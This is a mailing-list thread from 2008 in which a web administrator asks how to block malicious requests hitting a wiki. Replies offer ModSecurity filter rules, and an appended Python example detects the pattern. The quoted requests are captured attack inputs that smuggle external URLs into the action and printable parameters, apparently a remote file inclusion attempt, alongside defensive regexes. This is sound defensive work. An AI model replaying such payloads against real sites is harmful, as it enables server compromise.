Thread: [mod-security-users] How to block this type of attack
From: Steve W. <ste...@gm...> - 2008-01-29 08:57:07
Hi,

We are using mod_sec 1.9.5 w/ apache 1.3.x and I tried to write a simple rule to block the following attack but for some reason my rule didn't work. Can anyone assist?

GET members.php?title=Giles&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp

GET index.php?title=Help:Contents&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=history&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=http%3A%2F%2Fwww.fabcraft.co.uk%2Fforum%2Flovuqo%2Fzil%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp;amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=yes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B

The rule I tried is as follows:

SecFilterSelective REQUEST_URI "\.php\?.*%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp" "id:6600005,rev:1,severity:2,msg:'Generic URL Injection attack'"

thx,

SW
From: Christian B. <ch...@jw...> - 2008-01-29 09:11:22
Hi,

I do not have the 1.9 docs available right now, but for a quick shot, you could simply try to white-filter that resource by using a rule like this:

SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$

Which will allow the parameter title to only contain a word (including numbers, ':', '_' and '-') of length 0 to at most 25. Of course you need to adjust that to your application's needs.

In order to filter only the members.php script, you could put this into a LocationMatch directive:

<LocationMatch "^/members.php">
SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$
</LocationMatch>

Regards,
Chris

p.s: Note, all this has NOT been tested due to unavailability of ModSec 1.9 and is primarily meant to give a hint.
From: Steve W. <ste...@gm...> - 2008-01-29 10:02:58
Hi Chris,

Thanks for the suggestion and sample rule! Unfortunately, I couldn't get it to work using one of the following: (BTW 'ARGS:title' gave an error and I think 1.9 uses ARG_title)

Tried this rule:

SecFilterSelective REQUEST_URI "/amtwiki/index.php" "chain,id:6600005,rev:1,severity:2,msg:'Generic URL too long attack'"
SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$

Then tried just this:

SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$

And then tried this rule:

<LocationMatch "^/members.php">
SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$
</LocationMatch>

SW
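The thread does not arrive at a working rule. The following is an added example, not from the thread or from ModSecurity, that shows in Python what a filter for this request shape has to decide: percent-decode once, measure the longest chain of `amp;` tokens, and look at which parameter name actually carries the chain. The sample request lines, the MAX_AMP_DEPTH threshold and the RAW_URI_PATTERN regex are all constructed here and are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed request lines in the shape the thread describes (not the originals):
# a parameter separator HTML-escaped over and over, once with ';' percent-encoded
# as %3B and once sent raw, plus one ordinary request for comparison.
SAMPLE_REQUESTS = [
    "GET /members.php?title=Giles&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=history HTTP/1.0",
    "GET /index.php?title=Help:Contents&amp;amp;amp;amp;amp;amp;printable=yes HTTP/1.0",
    "GET /index.php?title=Help:Contents&action=history&printable=yes HTTP/1.0",
]

# Longest tolerated chain of "amp;" tokens (assumed threshold). One stray "&amp;"
# (depth 1) is a common benign page bug; the chains in the thread are ~20 deep.
MAX_AMP_DEPTH = 3

AMP_CHAIN = re.compile(r"(?:amp;)+")
# Equivalent test on the undecoded request target, for a filter that matches the
# raw URI: the ';' may be literal or %3B and the chain may start with '&' or ';'.
RAW_URI_PATTERN = re.compile(
    r"[&;]amp(?:(?:;|%3B)amp){" + str(MAX_AMP_DEPTH - 1) + r",}", re.IGNORECASE)


def amp_depth(query: str) -> int:
    """Longest run of consecutive 'amp;' tokens after one round of percent-decoding."""
    runs = AMP_CHAIN.findall(unquote(query))
    return max((len(run) // len("amp;") for run in runs), default=0)


def param_names(query: str) -> list:
    """Parameter names as the application sees them; shows which name carries the chain."""
    return [pair.split("=", 1)[0] for pair in unquote(query).split("&") if pair]


def inspect_request_line(line: str) -> dict:
    """Classify one 'METHOD /path?query HTTP/x.y' request line."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    depth = amp_depth(parts.query)
    return {"method": method, "path": parts.path, "amp_depth": depth,
            "params": param_names(parts.query), "block": depth >= MAX_AMP_DEPTH}


def raw_uri_match(target: str) -> bool:
    """Same decision taken on the undecoded request target (path + query)."""
    return RAW_URI_PATTERN.search(target) is not None


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect_request_line(request), raw_uri_match(request.split(" ")[1]))
```

Note that in the first sample the chain ends up inside a parameter name, so `title` itself decodes to a clean value; a whitelist on one named argument only sees what lands in that argument.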